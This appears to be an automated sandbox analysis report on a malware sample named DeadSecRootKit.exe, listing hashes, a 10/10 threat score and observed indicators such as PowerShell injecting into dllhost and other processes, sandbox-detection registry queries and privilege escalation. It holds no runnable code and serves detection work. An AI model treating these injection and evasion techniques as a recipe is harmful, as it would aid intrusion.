18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

Analysis

max time kernel
51s
max time network
19s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09-07-2024 22:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DeadSecRootKit.exe
Size

151KB
MD5

b8479a23c22cf6fc456e197939284069
SHA1

b2d98cc291f16192a46f363d007e012d45c63300
SHA256

18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f
SHA512

786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4
SSDEEP

3072:9QpsyzjtpfkzW/7F/ix/ApwXnDLn10FbxYSC/B9KIZb29b/HvX:9QpsyzjtpfOW/7FO/AKL10FbmlBoIYRn

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4856 created 564	4856	powershell.EXE	5

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4856 set thread context of 1052	4856	powershell.EXE	75

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE

Modifies data under HKEY_USERS 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Modifies registry class 46 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 560031000000000084589b64100057696e646f777300400009000400efbe724a0b5d84589b642e0000006b0500000000010000000000000000000000000000004a8a4e00570069006e0064006f0077007300000016000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5a00310000000000e95833b1100053797374656d33320000420009000400efbe724a0b5de95833b12e0000002f0f0000000001000000000000000000000000000000bd741c01530079007300740065006d0033003200000018000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3376	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4856	powershell.EXE
4856	powershell.EXE
4856	powershell.EXE
4856	powershell.EXE
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe
1052	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3376	Explorer.EXE
516	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4856	powershell.EXE
Token: SeDebugPrivilege	4856	powershell.EXE
Token: SeDebugPrivilege	1052	dllhost.exe
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeDebugPrivilege	516	taskmgr.exe
Token: SeSystemProfilePrivilege	516	taskmgr.exe
Token: SeCreateGlobalPrivilege	516	taskmgr.exe
Token: SeAuditPrivilege	2104	svchost.exe
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeAuditPrivilege	2300	svchost.exe
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE
Token: 33	516	taskmgr.exe
Token: SeIncBasePriorityPrivilege	516	taskmgr.exe
Token: SeShutdownPrivilege	3376	Explorer.EXE
Token: SeCreatePagefilePrivilege	3376	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1004	dwm.exe
1004	dwm.exe
1004	dwm.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
3376	Explorer.EXE
3376	Explorer.EXE
1004	dwm.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
1004	dwm.exe
1004	dwm.exe
516	taskmgr.exe
1004	dwm.exe
1004	dwm.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe
516	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3376	Explorer.EXE
3376	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 4856 wrote to memory of 1052	4856	powershell.EXE	75
PID 1052 wrote to memory of 564	1052	dllhost.exe	5
PID 1052 wrote to memory of 640	1052	dllhost.exe	7
PID 1052 wrote to memory of 724	1052	dllhost.exe	8
PID 1052 wrote to memory of 904	1052	dllhost.exe	13
PID 1052 wrote to memory of 1004	1052	dllhost.exe	14
PID 1052 wrote to memory of 1012	1052	dllhost.exe	15
PID 1052 wrote to memory of 396	1052	dllhost.exe	16
PID 1052 wrote to memory of 920	1052	dllhost.exe	17
PID 1052 wrote to memory of 1028	1052	dllhost.exe	18
PID 1052 wrote to memory of 1088	1052	dllhost.exe	19
PID 1052 wrote to memory of 1160	1052	dllhost.exe	21
PID 1052 wrote to memory of 1216	1052	dllhost.exe	22
PID 1052 wrote to memory of 1288	1052	dllhost.exe	23
PID 1052 wrote to memory of 1296	1052	dllhost.exe	24
PID 1052 wrote to memory of 1312	1052	dllhost.exe	25
PID 1052 wrote to memory of 1428	1052	dllhost.exe	26
PID 1052 wrote to memory of 1440	1052	dllhost.exe	27
PID 1052 wrote to memory of 1516	1052	dllhost.exe	28
PID 1052 wrote to memory of 1564	1052	dllhost.exe	29
PID 1052 wrote to memory of 1576	1052	dllhost.exe	30
PID 1052 wrote to memory of 1676	1052	dllhost.exe	31
PID 1052 wrote to memory of 1684	1052	dllhost.exe	32
